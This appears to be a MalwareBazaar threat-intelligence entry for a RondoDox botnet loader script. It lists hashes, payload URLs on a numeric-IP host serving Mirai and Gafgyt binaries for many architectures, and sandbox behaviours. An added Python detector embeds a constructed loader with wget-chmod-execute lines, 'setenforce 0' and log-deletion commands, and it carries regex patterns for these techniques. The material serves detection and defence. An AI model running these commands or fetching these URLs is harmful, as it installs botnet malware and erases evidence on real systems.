MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RondoDox


Vendor detections: 6



SHA256 hash: 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576
SHA3-384 hash: 14e5367bd8ee3b68902793de785356787f28cbc96a44e0daa306136dcfef71df6b173a1a7dceb43be0d9207748902966
SHA1 hash: 8cff1272d3e18ce658596dc9f6be684860e458cd
MD5 hash: c156b1348b56c5ce6205cd735266ad37
humanhash: oven-low-seven-saturn
File name: rondo.aqu.sh
Signature: RondoDox
File size: 9'432 bytes
First seen: 2025-12-26 00:27:44 UTC
Last seen: 2025-12-26 15:17:49 UTC
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:Ax0iRoLngD29clc5sFE6KCrdYnuQuMN7EJI+KybNwjaMyybNsDPi0MD6sO01Dkln:g0goLngucCJU
TLSH: T19112D9A839D432FAA8AD6502D393A27C5DC482D17073CAB5D8F844F66A794C8B05FF71
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: RondoDox sh
Payload URLs observed on the same host (one entry per target architecture; "n/a" means no sample of that payload is in MalwareBazaar):

URL | Malware sample (SHA256 hash) | Signature | Tags
http://41.231.37.153/rondo.lol | n/a | n/a | ua-wget
http://41.231.37.153/rondo.x86_64 | 092a91a8ec8d2c719cb214d41f5b4429fa31dbcd29fc698f05d22c97c0f40b0c | Gafgyt | gafgyt RondoDox ua-wget
http://41.231.37.153/rondo.i686 | d52f802a52b7dab9e7621e9c51ab12e44024d0de98ee3c87bbb99ce95dedfbf7 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.i586 | 4312bc23da1046b884de3be3326540afe18b423df3b0f13958219f87fceb81d6 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.i486 | n/a | n/a | mirai ua-wget
http://41.231.37.153/rondo.armv6l | 9772fc6fae400b0ecf6f47f0baea886401c78db2a89ca9fcd84285a77a8c0b18 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.armv5l | 57f1b04fa15dd398fafda2ddf97886ca274a80c2acc40ac2b4aca657c2de296c | Mirai | mirai RondoDox ua-wget
http://41.231.37.153/rondo.armv4l | 46e478702c3b475514dc7c61e494fed88796f8762c8d81d8893fc9e53c35fe38 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.armv7l | c53c1790a9133621d8e6e4611e981d26a3b338ff2d4c2921960fedba9d96354e | RondoDox | mirai RondoDox ua-wget
http://41.231.37.153/rondo.powerpc | a3b5397d5249497bd52e5a46635f135cd668e56ade104be100e6add9291fcb61 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.powerpc-440fp | n/a | n/a | mirai RondoDox ua-wget
http://41.231.37.153/rondo.mips | 1150d27a2f9e1bc4bd7e100fe6436a1318357963b6b1b25b381816e7f13e3904 | Gafgyt | gafgyt ua-wget
http://41.231.37.153/rondo.mipsel | a9d3f2d841cc1f2e1cffc45d498c7d082b370079702bec3a65bc294a33a9910a | Gafgyt | gafgyt ua-wget
http://41.231.37.153/rondo.arc700 | 1a1f3f0486a05ac160306cc1a7da24b9e6964b1298e915e363bba4612751a969 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.sh4 | 8427a0c43abda82169b6ac65d182d767c85c23b4bd56ed27d1e04461123ad3e2 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.sparc | 911ac65df00b90b505fa62e5949e249014ffefa3ab1d51d5a02a24a099bdf0d5 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.m68k | 0e571eaa740bcbb03d1d7d93df6630cbcedaedd0c3bdeabdf4df6f54fdacc248 | Mirai | mirai ua-wget
http://41.231.37.153/rondo.armeb | n/a | n/a | RondoDox ua-wget
http://41.231.37.153/rondo.armebhf | n/a | n/a | ua-wget

Intelligence

File Origin
# of uploads: 2
# of downloads: 52
Origin country: DE

Vendor Threat Intelligence (one block per vendor)

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox masquerade

Threat name: Script-Shell.Downloader.Heuristic
Status: Malicious
First seen: 2025-12-26 00:28:13 UTC
File Type: Text (Shell)
AV detection: 2 of 36 (5.56%)

Threat level: 2/5

Result
Malware family: n/a
Score: 7/10
Tags: defense_evasion discovery linux persistence privilege_escalation
Behaviour:
  Enumerates kernel/hardware configuration
  Reads runtime system information
  Writes file to shm directory
  Writes file to tmp directory
  Reads CPU attributes
  Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  Deletes log files
  Disables AppArmor
  Disables SELinux
  Enumerates running processes
  Writes file to user bin folder
  Writes file to system bin folder
  File and Directory Permissions Modification

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
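The rule description above names a technique rather than a hash: a shell script that fetches binaries from a numeric IP, chmods them and runs one per architecture. The sandbox behaviours in the Intelligence section add the defense-evasion markers (SELinux and AppArmor disabled, log files deleted, staging in tmp/shm). The Python below is an added example that triages a script for exactly those markers and extracts the download host and per-architecture payload names as IOCs; it is not MalwareBazaar, YARAhub or the rule author's code and it is not the YARA rule itself. The loader text inside it is constructed for the example (the documentation address 203.0.113.10 stands in for the 41.231.37.153 host in the URL table, and the lines are not the contents of rondo.aqu.sh); the architecture-suffix list, the regexes and the "three or more architectures" threshold are this example's own assumptions.

```python
"""Heuristic triage of a Linux/IoT multi-architecture botnet loader script.

Added example (not MalwareBazaar, YARAhub or rule-author code, and not the
MAL_Linux_IoT_MultiArch_BotnetLoader_Generic rule itself). The loader text
below is CONSTRUCTED to show the pattern; it is not the content of rondo.aqu.sh.
"""
import re
from dataclasses import dataclass, field

# Payload suffixes as seen in the URL table for this host (rondo.x86_64,
# rondo.armv7l, rondo.mips, ...). The list is this example's assumption.
ARCH_SUFFIXES = (
    "x86_64", "i686", "i586", "i486", "armv4l", "armv5l", "armv6l", "armv7l",
    "armeb", "armebhf", "powerpc", "powerpc-440fp", "mips", "mipsel", "arc700",
    "sh4", "sparc", "m68k",
)
_ARCH_BY_LENGTH = sorted(ARCH_SUFFIXES, key=len, reverse=True)  # 'armebhf' before 'armeb'

# Technique markers the rule description names: numeric-IP download, chmod, execution.
NUMERIC_IP_URL = re.compile(r"(?:https?|tftp|ftp)://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([\w./-]+)")
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s")
# Defense-evasion markers matching the sandbox behaviours listed on this page.
DEFENSE_EVASION = {
    "selinux_disable": re.compile(r"\bsetenforce\s+0\b"),
    "apparmor_disable": re.compile(r"\b(?:aa-teardown|systemctl\s+(?:stop|disable)\s+apparmor)\b"),
    "log_deletion": re.compile(r"\brm\s+(?:-\S+\s+)*(?:/var/log/\S+|\S*\.bash_history)"),
    "tmp_or_shm_staging": re.compile(r"\bcd\s+/(?:tmp|dev/shm|var/run|mnt)\b"),
}


@dataclass
class Verdict:
    numeric_ip_hosts: set = field(default_factory=set)
    payload_names: list = field(default_factory=list)
    archs: set = field(default_factory=set)
    uses_downloader: bool = False
    chmods: bool = False
    evasion: set = field(default_factory=set)

    @property
    def is_multiarch_loader(self) -> bool:
        # Numeric-IP fetch + chmod + at least three distinct architectures (assumed threshold).
        return (bool(self.numeric_ip_hosts) and self.uses_downloader
                and self.chmods and len(self.archs) >= 3)


def _arch_of(name: str):
    for suffix in _ARCH_BY_LENGTH:
        if name.endswith("." + suffix):
            return suffix
    return None


def analyze(script: str) -> Verdict:
    """Scan a shell script line by line; blank lines, comments and the shebang are skipped."""
    v = Verdict()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        v.uses_downloader |= bool(DOWNLOADER.search(line))
        v.chmods |= bool(CHMOD_EXEC.search(line))
        for host, path in NUMERIC_IP_URL.findall(line):
            v.numeric_ip_hosts.add(host)
            name = path.rsplit("/", 1)[-1]
            v.payload_names.append(name)
            arch = _arch_of(name)
            if arch:
                v.archs.add(arch)
        for tag, pattern in DEFENSE_EVASION.items():
            if pattern.search(line):
                v.evasion.add(tag)
    return v


def extract_iocs(script: str) -> dict:
    """Hosts and payload names a responder would block or hunt for."""
    v = analyze(script)
    return {"hosts": sorted(v.numeric_ip_hosts),
            "payloads": sorted(set(v.payload_names)),
            "archs": sorted(v.archs)}


# CONSTRUCTED loader: 203.0.113.10 is a documentation address, not the host in the URL table.
SAMPLE_LOADER = """#!/bin/sh
cd /tmp || cd /dev/shm || cd /var/run
setenforce 0 2>/dev/null
wget http://203.0.113.10/rondo.x86_64 -O rondo.x86_64; chmod 777 rondo.x86_64; ./rondo.x86_64 rondo
wget http://203.0.113.10/rondo.armv7l -O rondo.armv7l; chmod 777 rondo.armv7l; ./rondo.armv7l rondo
wget http://203.0.113.10/rondo.mips -O rondo.mips; chmod 777 rondo.mips; ./rondo.mips rondo
wget http://203.0.113.10/rondo.mipsel -O rondo.mipsel; chmod 777 rondo.mipsel; ./rondo.mipsel rondo
wget http://203.0.113.10/rondo.sh4 -O rondo.sh4; chmod 777 rondo.sh4; ./rondo.sh4 rondo
rm -rf /var/log/wtmp /var/log/btmp ~/.bash_history
"""

# CONSTRUCTED benign script: named host, single archive, no chmod/exec chain.
BENIGN_SCRIPT = """#!/bin/sh
curl -fsSL https://updates.example.com/agent.tar.gz -o /tmp/agent.tar.gz
tar -xzf /tmp/agent.tar.gz -C /opt/agent
"""

if __name__ == "__main__":
    for label, text in (("loader", SAMPLE_LOADER), ("benign", BENIGN_SCRIPT)):
        v = analyze(text)
        print(label, "multiarch_loader=%s evasion=%s" % (v.is_multiarch_loader, sorted(v.evasion)))
    print(extract_iocs(SAMPLE_LOADER))
```

The numeric-IP scope is the rule's own and is deliberately narrow: a loader that fetches from a hostname, or that builds the payload name from a shell variable inside a loop, passes this text-only check, which is why the sandbox behaviours above (tmp/shm writes, SELinux and AppArmor disabled, log deletion) are the second line of detection rather than a substitute for it.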

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  RondoDox
    sh 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576 (this sample)

Delivery method: Distributed via web download

Comments